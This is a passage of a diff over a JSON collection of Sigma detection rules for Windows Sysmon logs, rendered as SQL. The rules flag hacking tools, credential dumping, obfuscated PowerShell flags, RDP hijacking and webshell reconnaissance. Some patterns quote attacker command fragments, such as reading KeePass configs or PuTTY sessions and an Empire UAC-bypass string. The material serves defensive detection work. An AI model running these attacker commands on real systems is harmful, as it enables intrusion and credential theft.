= '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Exploit for CVE-2017-0261", - "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", "status": "test", - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.t1059.001" ], "falsepositives": [ - "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_0261.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "Suspicious Execution From GUID Like Folder Names", - "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "status": "experimental", - "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Runscripthelper.exe", + "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "status": "test", + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.execution", + "attack.t1059", "attack.defense_evasion", - "attack.t1027" + "attack.t1202" ], "falsepositives": [ - "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\{%' ESCAPE '\\' AND Image LIKE '%}\\\\%' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" + "filename": "proc_creation_win_lolbin_runscripthelper.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Programs that use the same command line flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Wscript Execution from Non C Drive", - "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", - "status": "experimental", - "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", - "author": "Aaron Herman", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "status": "stable", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Legitimate scripts located on other partitions such as \"D:\"" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" - }, - { - "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", - "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", - "status": "experimental", - "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", - "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_powershell_download_dll.yml" - }, - { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", "attack.defense_evasion", - "attack.t1036.004", "attack.t1027", "attack.execution", - "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", + "title": "WMIC Remote Command Execution", + "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "description": "Detects the execution of WMIC to query information on a remote system", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_wmic_remote_execution.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "title": "SOURGUM Actor 